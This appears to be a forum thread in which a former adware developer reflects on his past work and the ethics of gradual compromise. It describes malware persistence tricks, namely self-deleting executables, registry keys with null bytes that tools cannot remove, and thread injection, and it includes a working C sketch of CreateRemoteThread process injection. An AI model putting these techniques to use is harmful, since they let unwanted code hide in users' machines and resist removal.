I gave this interview a long time ago to a completely unknown security blogger. (I think her blog had like 10 subscribers at the time.) Quite a while later, she published it, and she had gotten at least one more subscriber in the meantime, and that was Bruce Schneier. He reblogged it on his blog, and from there it took off on slashdot, reddit, news.yc, etc.
The article linked to my site, which in turn had my cell phone number on it. I figured that I would get a massive avalanche of death threats, etc., but interestingly, I was only contacted a few times by email, and those were all positive things (offers for consulting gigs that I didn't take, a few conference talks that I did and that ultimately led to me joining twitter a while later, requests for advice).
It was striking to me at the time that the collective reaction of the world was so positive. I had feared that I would be stuck in an adware-developer ghetto forever. We often talk about the fact that Silicon Valley has succeeded in part due to its stance on failure, and I sense an echo of that in how it shook out for me.
Feel free to ask me anything. I figure it's the ongoing part of my penance. :)
I didn't catch this when it was first posted, I'm glad it showed up here.
Possibly you didn't get negative responses because you were sincere and introspective. Most people can understand the idea that when in need of money, you slowly make concessions and compromises that you wouldn't otherwise make.
I remember when I was at Red Hat, one of the engineers had found a way to clear a worm off Red Hat servers using our auto-update tool, but we weren't allowed to push it because of the possible unintended consequences.
I'd be really curious to hear whether you had to face any of those kinds of things. Were there any catastrophes (technically speaking) from doing so much low-level wrangling? It seems like one false move could drop half your nodes; were there any fail-safes?
Also, unrelated (and apologies for the Quora link), here's a really cool answer from someone who used to spam people: http://qr.ae/Ga85e It's very different from your experience in that they were non-technical and in a poor region, but still interesting to see global perspectives on similar work.
I think you're right. If people talk honestly about why they did things and weren't obviously trying to do ill from the start, it's pretty easy to empathize.
I read that the participants in the Milgram experiments were _way_ disproportionately likely to be conscientious objectors later in life, and that they attributed this to having been in the experiments. I hope that I've been immunized like they were.
We were crazy careful about screwing up people's machines, because anything that we did that made it seem to malfunction would likely result in them reinstalling the OS over us, and while we had some ideas about how to persist across a reinstall, it was a few bridges too far.
I certainly can't say that we avoided all catastrophe, but I'm not aware of us ever causing one. We had pretty good abstractions: the stack-shuffling code was fully encapsulated so that it wasn't just littered about our normal code, etc.
We also tried pretty hard to avoid the really dangerous stuff. It sounds crazy to put arbitrary code in some random process, but if you know that it doesn't leak, and it never interacts with other threads in the process, it's not really _that_ risky.
One thing that probably also helped is that we had so much feedback from the individual ad clients. So we would know pretty fast if something started happening.
Really interesting. I've watched controlled environments of less than 50 nodes go completely haywire from bad code, so it's quite a feat to push code into 4 million questionable environments while at the same time dodging the virus soup from competitors.
I think it's harder to safely make changes to development machines, because the coupling between components is greater. If you want to change, e.g., libxml or something like that, lots of processes that you don't know about might be affected, and all hell can break loose.
By contrast, I was generally nuking random userland processes, which no process (or user) would mourn or miss. I think that is a lot safer. There were cases where we would touch something important, like the CreateRemoteThread stuff, but that was a relatively small amount of our code, which rarely changed, and again, it had very little interaction with anyone else's code.
It's also possible that we _did_ create a lot of havoc, but I didn't know. I think that's less likely because I think we would have noticed the loss of revenue, but it's possible.
Yeah, I learned tons about Windows internals. Three standouts:
1: We never hit a limit to what you could do to the stack. It was trivial to write a function F that would fake the stack such that you would then "return from" some other function G (that had never actually been called) to yet a third function H that did something you wanted. This turned out to be useful in creating self-deleting executables.
2: There were several cases in which backward-compatibility APIs created opportunities for the clever. One example was the handling of registry strings. They are, internally, WinNT counted unicode strings, but are generally accessed by older Win32 apps, which use C strings. This means that you could create a registry key using the WinNT APIs, where the string identifier for the key had a null byte in the middle. Then Win32 apps (like some written by competitors to kill our apps, and also regedit) would be unable to do anything to that registry key, because they literally could not express the key's name.
3: windows is CRAZY hackable. It supports an API called CreateRemoteThread, which lets you start a thread in some other, random process, running arbitrary code that you specify. This means that if you can get a file down to the machine and execute it, it can load a bunch of bytes into memory, tell other processes to execute them, and terminate, using 1 above to delete itself. This made it a fairly hard target for most removal techniques: you'd have to find all the threads, out of all the threads running on the system, that were running my code, and kill them before they could replicate into another process and/or find the processes that were killing their siblings and retaliate.
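The classic shape of that injection looks roughly like this (a Windows-only sketch, not the author's actual code; error handling trimmed, and the PID and payload are hypothetical):

```c
#include <windows.h>

/* Copy a payload into another process and run it there. */
BOOL inject(DWORD pid, const unsigned char *payload, SIZE_T len)
{
    HANDLE proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!proc) return FALSE;

    /* Carve out executable memory in the target process... */
    LPVOID mem = VirtualAllocEx(proc, NULL, len,
                                MEM_COMMIT | MEM_RESERVE,
                                PAGE_EXECUTE_READWRITE);
    SIZE_T written;
    BOOL ok = mem != NULL
        /* ...copy the payload in... */
        && WriteProcessMemory(proc, mem, payload, len, &written)
        /* ...and start a thread at it. The injecting process can now
           exit; the code lives on inside someone else's process. */
        && CreateRemoteThread(proc, NULL, 0,
                              (LPTHREAD_START_ROUTINE)mem,
                              NULL, 0, NULL) != NULL;

    CloseHandle(proc);
    return ok;
}
```

A remover then has no executable on disk to point at, which is what makes the thread-hunting the author describes so painful.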
Windows also allows random processes to tell the OS that they are SO IMPORTANT that the OS should immediately BSOD on that process terminating. We never used that one.
As far as stuff I still use today, no specific technical techniques, but lots of general things:
- It's crazy how fast you can level up with a hard problem and room to run. I knew basically nothing when I started, and within a year or so, the team I ran and I had done some pretty cool stuff, and beat the hell out of a lot of other companies. For a while, I was told that installing our adware was the best way to uninstall some obscure but horrendous Russian malware.
- Tools trump humans. Lots of other companies were trying to clobber us at the same time we were clobbering them. We mostly won, and in several cases completely ran the table against the other company. (by which I mean we wiped them completely off the machines that had both their client and ours, without losing a significant number of machines ourselves). It wasn't that they were dumb or we were geniuses, but we would write like 10 lines of scheme and they would have to write a whole new executable, probably a few thousand lines. Probably lots of coders were faster than us, but not many were 100X faster.
There were probably others, but those are the standouts.
Having had my Milgram immunization, I would probably be able to resist the temptation. :)
That said, I doubt anyone would be particularly interested: all of this is pretty out of date. I was pretty good with Windows ME, 98, and XP, but I don't know anything about Vista and more recent versions. It wasn't _that_ hard to figure this stuff out; the TLAs must have vastly better people.
It does make me wonder what's going on in China, though: I'm told they are basically all XP. Is there an insane amount of hacking going on there? I've periodically thought about setting up a honeypot to see what's up. It turns out to be really hard: you can't just run XP in a VM, because most VMs are (were?) detectable by even a moderately sophisticated attacker. The best idea I had was to have an external box record all the traffic in and out, and have a process on-box watch for new processes and track them. Maybe I would find some interesting beasties.
What do you mean you could write 10 lines of Scheme where they would have to write a whole new executable? Did you have some really applicable template or something, or are you just implying that Scheme is vastly more productive than C?
I talked with some of the opposition later in job interviews, and they would typically write/modify a program in C that would find and kill our client. Their process tended to be: get a machine with our client, write a program that would find some trace of us and kill it, but not get everything, then edit the C, recompile, reinstall, repeat.
My process was: get their client installed, poke around in a repl until I was confident I could find it and all its friends, write a function to clobber all of that, then iterate if needed. Where they would have to edit/recompile/run, I would just do a new thing in a repl. Then, too, my code was shorter, mostly from Scheme vs. C and partly because I had better libraries than they did.
>I said, “I know enough C that I could kick the virus off the machines,” and I did. They said “Wow, that was really cool. Why don’t you do that again?” Then I started kicking off other viruses, and they said, “That’s pretty cool that you kicked all the viruses off. Why don’t you kick the competitors off, too?”
>It was funny. It really showed me the power of gradualism. It’s hard to get people to do something bad all in one big jump, but if you can cut it up into small enough pieces, you can get people to do almost anything.
This rings incredibly true to me. Especially in my job field.
edit:
>The good news is that I’ve been on the other side of those automated script things. Their capability is incredibly dangerous, but the actuality tends not to be.
>It would have been fairly trivial for me to go spelunking for people’s credit card information or whatever. I had four million nodes. I could have done it without anybody at the company even noticing. I was the guy writing Scheme, so I could have just put a text file somewhere and then made it go away, and there wouldn’t even have been an executable lying around.
>But I didn’t. To do that, by definition you have to be willing to become a criminal, and that’s a little bit rare. So I’m not too worried about that.
I also think this is a good point. A lot of services out there could potentially ruin your life (or at least make it difficult) if there's a rogue employee who targets you (or targets a lot of people). An ISP employee looking at web logs, a Google employee reading all your emails... The same goes for the NSA, just the power that can be abused is even larger.
I think it's inevitable that some humans will always be able to access these kinds of things, so I hope that companies (and the NSA) are instituting controls and checks, including anomaly detection, to find rogue, malicious, or snooping employees.
It seems to me that very few organizations (*) have effective countermeasures against bad behavior, and yet very little seems to happen anyway.
(*) Google had that guy who stalked people ( http://gawker.com/5637234/gcreep-google-engineer-stalked-tee... )
and I've read that intelligence circles have a whole category called LOVINT for people spying on crushes. That said, they have hundreds of thousands of employees between them, and the incidence rate is probably really low.
>> It would have been fairly trivial for me to go spelunking for people’s credit card information or whatever... But I didn’t. To do that, by definition you have to be willing to become a criminal, and that’s a little bit rare. So I’m not too worried about that.
>> It was funny. It really showed me the power of gradualism. It’s hard to get people to do something bad all in one big jump, but if you can cut it up into small enough pieces, you can get people to do almost anything.
Yeah, I can absolutely see what you mean, but I don't think there is as much incongruity as you think.
Had I been working for the Russian mob or whatever (that is, an organization that is comfortable with being explicitly criminal), I don't know, and fear, what would have happened. However, most organizations are not comfortable with telling employees to break the law, most of the time. In particular, it seems to me to be really rare in the private sector; I don't have any real experience with government.